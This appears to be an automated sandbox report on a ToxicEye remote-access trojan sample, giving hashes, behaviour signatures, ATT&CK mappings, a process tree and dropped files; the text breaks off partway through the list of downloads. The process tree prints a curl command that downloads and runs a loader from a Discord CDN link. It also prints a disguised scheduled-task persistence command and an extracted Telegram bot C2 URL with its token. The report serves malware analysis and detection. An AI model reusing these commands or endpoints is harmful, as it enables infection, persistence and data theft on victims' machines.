toxiceye | 7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7

Analysis

max time kernel
146s
max time network
148s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
18-01-2024 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
Size

13.8MB
MD5

d5e0c1a6916a3424abec42a62e9af859
SHA1

1828fb74c0e0f54dad6e06df6926c8eb58c3a203
SHA256

7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7
SHA512

fc045d983c40c7056404416d4dd8241c86e1ec1c05e802b17212f93f3cc602d63099316e4ab78a96e4e5fadac64042b3c281871ce2cb1cca1e28f8e5763486d6
SSDEEP

393216:Ugan8IDOJCnwCpvC3VyiaRiGRObwZngWv:HHxJuwCk3VfkiGwbMvv

Score

10^/10

toxiceye rat trojan upx

Malware Config

Extracted

Family

toxiceye

https://api.telegram.org/bot6782288559:AAGGaNp1iJda_iae5clmNAjmS8bZxRP8kMY/sendMessage?chat_id=6117387875

Signatures

ToxicEye
ToxicEye is a trojan written in C#.
rat trojan toxiceye

Executes dropped EXE 9 IoCs

Processes:

DRIVER.EXEPROTECTION.EXESUBZERO.EXESUBZEROFN UPDATED SPOOFER.EXEPROTECTION.EXEWindowsInput.exePERMENANTSPOOFER.exeMicrosoft Windows Defender.exe

pid	process
2708	DRIVER.EXE
2108	PROTECTION.EXE
2580	SUBZERO.EXE
2704	SUBZEROFN UPDATED SPOOFER.EXE
2256	PROTECTION.EXE
1232
1944	WindowsInput.exe
2392	PERMENANTSPOOFER.exe
1080	Microsoft Windows Defender.exe

Loads dropped DLL 16 IoCs

Processes:

7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exePROTECTION.EXEPROTECTION.EXESUBZEROFN UPDATED SPOOFER.EXE

pid	process
2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
2612
2108	PROTECTION.EXE
2256	PROTECTION.EXE
2256	PROTECTION.EXE
2256	PROTECTION.EXE
2256	PROTECTION.EXE
2256	PROTECTION.EXE
2256	PROTECTION.EXE
2256	PROTECTION.EXE
1232
2704	SUBZEROFN UPDATED SPOOFER.EXE
2704	SUBZEROFN UPDATED SPOOFER.EXE

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI21082\python312.dll	upx
\Users\Admin\AppData\Local\Temp\_MEI21082\python312.dll	upx
behavioral1/memory/2256-144-0x000007FEF5050000-0x000007FEF5728000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 wtfismyip.com
2 wtfismyip.com

flow	ioc
4	wtfismyip.com
2	wtfismyip.com

Drops file in System32 directory 3 IoCs

Processes:

SUBZEROFN UPDATED SPOOFER.EXEWindowsInput.exe

description	ioc	process
File created	C:\Windows\SysWOW64\WindowsInput.exe	SUBZEROFN UPDATED SPOOFER.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsInput.InstallLog	WindowsInput.exe
File created	C:\Windows\SysWOW64\WindowsInput.InstallState	WindowsInput.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe

description	pid	process	target process
PID 2664 set thread context of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2008 schtasks.exe
2784 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2172 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1940 tasklist.exe

pid	process
2008	schtasks.exe
2784	schtasks.exe

pid	process
2172	timeout.exe

pid	process
1940	tasklist.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

SUBZERO.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	SUBZERO.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	SUBZERO.EXE

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

Microsoft Windows Defender.exe

pid	process
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe
1080	Microsoft Windows Defender.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

DRIVER.EXEtasklist.exeMicrosoft Windows Defender.exe

description	pid	process
Token: SeDebugPrivilege	2708	DRIVER.EXE
Token: SeDebugPrivilege	1940	tasklist.exe
Token: SeDebugPrivilege	1080	Microsoft Windows Defender.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Microsoft Windows Defender.exe

pid process

1080 Microsoft Windows Defender.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exePROTECTION.EXESUBZERO.EXEcmd.exeDRIVER.EXESUBZEROFN UPDATED SPOOFER.EXEcmd.exe

description	pid	process	target process
PID 2664 wrote to memory of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
PID 2664 wrote to memory of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
PID 2664 wrote to memory of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
PID 2664 wrote to memory of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
PID 2664 wrote to memory of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
PID 2664 wrote to memory of 2344	2664	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
PID 2344 wrote to memory of 2708	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	DRIVER.EXE
PID 2344 wrote to memory of 2708	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	DRIVER.EXE
PID 2344 wrote to memory of 2708	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	DRIVER.EXE
PID 2344 wrote to memory of 2708	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	DRIVER.EXE
PID 2344 wrote to memory of 2108	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	PROTECTION.EXE
PID 2344 wrote to memory of 2108	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	PROTECTION.EXE
PID 2344 wrote to memory of 2108	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	PROTECTION.EXE
PID 2344 wrote to memory of 2108	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	PROTECTION.EXE
PID 2344 wrote to memory of 2580	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZERO.EXE
PID 2344 wrote to memory of 2580	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZERO.EXE
PID 2344 wrote to memory of 2580	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZERO.EXE
PID 2344 wrote to memory of 2580	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZERO.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2344 wrote to memory of 2704	2344	7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe	SUBZEROFN UPDATED SPOOFER.EXE
PID 2108 wrote to memory of 2256	2108	PROTECTION.EXE	PROTECTION.EXE
PID 2108 wrote to memory of 2256	2108	PROTECTION.EXE	PROTECTION.EXE
PID 2108 wrote to memory of 2256	2108	PROTECTION.EXE	PROTECTION.EXE
PID 2580 wrote to memory of 2204	2580	SUBZERO.EXE	cmd.exe
PID 2580 wrote to memory of 2204	2580	SUBZERO.EXE	cmd.exe
PID 2580 wrote to memory of 2204	2580	SUBZERO.EXE	cmd.exe
PID 2204 wrote to memory of 3028	2204	cmd.exe	certutil.exe
PID 2204 wrote to memory of 3028	2204	cmd.exe	certutil.exe
PID 2204 wrote to memory of 3028	2204	cmd.exe	certutil.exe
PID 2204 wrote to memory of 3020	2204	cmd.exe	find.exe
PID 2204 wrote to memory of 3020	2204	cmd.exe	find.exe
PID 2204 wrote to memory of 3020	2204	cmd.exe	find.exe
PID 2204 wrote to memory of 2060	2204	cmd.exe	find.exe
PID 2204 wrote to memory of 2060	2204	cmd.exe	find.exe
PID 2204 wrote to memory of 2060	2204	cmd.exe	find.exe
PID 2580 wrote to memory of 1780	2580	SUBZERO.EXE	cmd.exe
PID 2580 wrote to memory of 1780	2580	SUBZERO.EXE	cmd.exe
PID 2580 wrote to memory of 1780	2580	SUBZERO.EXE	cmd.exe
PID 2708 wrote to memory of 2008	2708	DRIVER.EXE	schtasks.exe
PID 2708 wrote to memory of 2008	2708	DRIVER.EXE	schtasks.exe
PID 2708 wrote to memory of 2008	2708	DRIVER.EXE	schtasks.exe
PID 2580 wrote to memory of 2336	2580	SUBZERO.EXE	cmd.exe
PID 2580 wrote to memory of 2336	2580	SUBZERO.EXE	cmd.exe
PID 2580 wrote to memory of 2336	2580	SUBZERO.EXE	cmd.exe
PID 2708 wrote to memory of 1356	2708	DRIVER.EXE	cmd.exe
PID 2708 wrote to memory of 1356	2708	DRIVER.EXE	cmd.exe
PID 2708 wrote to memory of 1356	2708	DRIVER.EXE	cmd.exe
PID 2704 wrote to memory of 1944	2704	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2704 wrote to memory of 1944	2704	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2704 wrote to memory of 1944	2704	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 2704 wrote to memory of 1944	2704	SUBZEROFN UPDATED SPOOFER.EXE	WindowsInput.exe
PID 1356 wrote to memory of 1940	1356	cmd.exe	tasklist.exe
PID 1356 wrote to memory of 1940	1356	cmd.exe	tasklist.exe
PID 1356 wrote to memory of 1940	1356	cmd.exe	tasklist.exe
PID 1356 wrote to memory of 1028	1356	cmd.exe	find.exe
PID 1356 wrote to memory of 1028	1356	cmd.exe	find.exe
PID 1356 wrote to memory of 1028	1356	cmd.exe	find.exe
PID 1356 wrote to memory of 2172	1356	cmd.exe	timeout.exe
PID 1356 wrote to memory of 2172	1356	cmd.exe	timeout.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
"C:\Users\Admin\AppData\Local\Temp\7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2664
- C:\Users\Admin\AppData\Local\Temp\7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe
  "C:\Users\Admin\AppData\Local\Temp\7c945b70315e7b1dfa807549c90712e0792380a418c13d56dbd853e4ddddecc7.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE
    "C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"
      4⤵
      Creates scheduled task(s)
      PID:2008
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpB53B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpB53B.tmp.bat
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Windows\system32\find.exe
        
        find ":"
        5⤵
        
        PID:1028
    - - C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 2708"
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1940
    - - C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:2172
    - - C:\Users\SubZ\PERMENANTSPOOFER.exe
        
        "PERMENANTSPOOFER.exe"
        5⤵
        Executes dropped EXE
        
        PID:2392
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "Microsoft OneDrive Defender" /tr "C:\Users\SubZ\PERMENANTSPOOFER.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:2784
- - C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE
    "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE
      "C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2256
- - C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE
    "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE"
    3⤵
    - Executes dropped EXE
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5 | find /i /v "md5" | find /i /v "certutil"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2204
    - - C:\Windows\system32\certutil.exe
        
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE" MD5
        5⤵
        
        PID:3028
    - - C:\Windows\system32\find.exe
        
        find /i /v "md5"
        5⤵
        
        PID:3020
    - - C:\Windows\system32\find.exe
        
        find /i /v "certutil"
        5⤵
        
        PID:2060
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1196977210687488151/1197232221279485992/loader.exe -o NewVersion.exe --silent
      4⤵
      PID:1780
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c NewVersion.exe
      4⤵
      PID:2336
- - C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE
    "C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\SysWOW64\WindowsInput.exe
      "C:\Windows\SysWOW64\WindowsInput.exe" --install
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:1944
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1080

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\DRIVER.EXE

Filesize
111KB

MD5
51ae04a1f94c43bc3cdbe57ab789b955

SHA1
c73cd0cc75fd0ad05d6ac2c2651899ae47fd2c0c

SHA256
8e539cc20073dd335eb195c56dae58c43e69b813a984f2fa76421a0880da5c1d

SHA512
e566e3ad4bc43e46fb005458c68472627fd9b2dca5c69808017203519b22d7991cdc90d4e2ca7d3f7f57c1b52188959cda1109300bfb79875ee5a1f5b477a8ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
545KB

MD5
854d2f24b5d2b87f92f832ca9e3d6c91

SHA1
72c0c0ccfe3194059fade3a3bf521a4637ae2fad

SHA256
cd91ec5ce46ab851bb3e21dc129adf77f9b6642555b93d5512c8f37de886d1fc

SHA512
5ded1a346753195e1079ea4a2d0d69a2650010d9ef4b0e834b48c1ac1d941eb32a2ff98696436530c297e239c7d96b8152e846205e774d94a11c5d07b79bc43b

Download Submit
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
708KB

MD5
b03f883f7052e03fccdcefebdaf5969f

SHA1
fdc2d26cc1793e40c34889a528ef45fda909411d

SHA256
163805de9ca9067a35b8c025ddd11a500afa8a03d987edc85349abf29cce9266

SHA512
711a92438488c8e3cde97631add922927475d4c45bbdf5fb888d12234db526ff19f7bba4a6b2521308a00892ef3e685cf6996ef145d95cfc51f507e3e5dedf70

Download Submit
C:\Users\Admin\AppData\Local\Temp\PROTECTION.EXE

Filesize
139KB

MD5
260e05be993ebaf34a87038366de58e5

SHA1
e4967d19876258cb9159ee915fdb5ba558070cf7

SHA256
8b51b4df00c54ade6b0c513e297205564d0ebdc4c4e8e6ebe796258a9a969f93

SHA512
d8c2c9822b508166ad7915bd9006e2fac4215b6c288703ae25f123e56266504ee17b78602ceaff55946a7b3edb7bda7c28ae63ce65aa5cde0f8f3bdad2be02a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
177KB

MD5
2515ee5f4dfa359933b0c2fb996f608c

SHA1
d699ca9edeb9f10167b256f0411667818def41af

SHA256
4833ae3e4e669c498fc9075f9d3af98e7e1a862212450d816b3fa0a04d23554e

SHA512
c182afb875c739b72e21f96c3023d052ac10cde3c6a8650ac0add38c497b0fefa1f8f0ff38917a16adf7bc9b838ef88c81db38ee10d306ae8c1a2d5489822d6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZERO.EXE

Filesize
368KB

MD5
d56490eb26eff443d295297e2aa9c352

SHA1
a8b56305fc913b6a062f327877fff28cb1600e1c

SHA256
8797090449981f5dbd5e616d7c334b9ff4da61f8f413d5f64f760c7c41566295

SHA512
af86d1812e07bd030be3c1d2e205372a55b24ae931d4d85235e9c4bc3dd782495b9b3e21be18fe9256c52f9cd724238dd3e4006ea860863c6236a67aaa135ed9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

Filesize
231KB

MD5
d76da7202d49209e2e05bd16405eeb9d

SHA1
41539f578d43e570f9c86ff3563ac5006414d173

SHA256
7cb9e701556359c2313caae43413e69bc7c9242795db2cce2360b02986b6cefb

SHA512
4afeea8224d3750421cf96591165859e838a8bff142447dde21fe1e2ffaaa8670eb72e4653724556cf23dbf683a18972fd6af69ac227a34f4983d0da48574c3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\SUBZEROFN UPDATED SPOOFER.EXE

Filesize
103KB

MD5
6499248caba1c09c6e99bc17d632c724

SHA1
eccf02217a9db8d50efe10d381f97186f40a4776

SHA256
e8ff18e3f41186b5d60d9d55f106b8334ef72171ea47a56a84f40bd2a5c6042f

SHA512
85acb3d2481b8a7faa279e147c9d86d675d383cee421cd52bab91fd486296108d824d16cac709de655134f9089c7dec0934d805e3f0980d1def125edb655f7ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21082\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
21KB

MD5
4380d56a3b83ca19ea269747c9b8302b

SHA1
0c4427f6f0f367d180d37fc10ecbe6534ef6469c

SHA256
a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

SHA512
1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21082\api-ms-win-core-timezone-l1-1-0.dll

Filesize
21KB

MD5
2554060f26e548a089cab427990aacdf

SHA1
8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

SHA256
5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

SHA512
fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21082\python312.dll

Filesize
252KB

MD5
05266ac597def6f46e9a1be40fc1ac1b

SHA1
7fc35a1494c3280eb880163201e55ffccaac69fe

SHA256
2d306fb97786d72e51e3015656f0a4a154c55fa101949a79806ca8443ee52b78

SHA512
a2864439b2cd039914b167e0981583ec94e418f0d4e4ee3072b975bf43989a66d419aa467da18ce4035e2b1dbb2eb312fca9e68e2f2e2e65b65e1cfa7a48d41e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI21082\ucrtbase.dll

Filesize
69KB

MD5
4120b393bf2b7143fa50ab60754b7776

SHA1
d5d947d0de5af3c9d1f83680bc7c9a4941642a8b

SHA256
b5143cc2801878147d904497ef8a781de0420748dea59e3da7ad34b5afedf24b

SHA512
d5b83436351681830512616e747638b1dc971a570a31314b1abaecb2610a677dad832a776656e064887dce172457d92ac627efa9f9a4a5315c25bc98ce473581

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpB53B.tmp.bat

Filesize
192B

MD5
029e5770fb834c34083d35b80c3550aa

SHA1
b6087d0cf8973c6ec31bdbf0dcdef5a9d86ee781

SHA256
1fba3e092143ebc58ce7baa0a05ae9c1da7b620bc2eaef7187414276507e4627

SHA512
27815618afa1f2152dc3579a45cd8aee11a3bfc4211ecbe334c94a94e11965fcdf70876db3fccc927eea3c93e8a759aa66d3407d2cb0c18c14d500d26ba1b5fc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
25KB

MD5
f931f8089d717ff221f68e675ad64fbf

SHA1
51346d5b4e9d0170778d31ec4837d47fa8502fc1

SHA256
43513725867c7f82da781dae2446af14812d96402de1d4937db9fc208e66de82

SHA512
ef2f017c31de58f53b029df0e61880a6836d9c3871a390d4ca3eeeda86265ba7ca5d359ebd5d7f634873195f59115a52db5ebe96c62a6d769e1513f2885e43f3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Microsoft Windows Defender.exe

Filesize
85KB

MD5
016a69df4c102a87707a8ca51a192f72

SHA1
6049ca200eda2b8fbed39c883b13c76e6cede466

SHA256
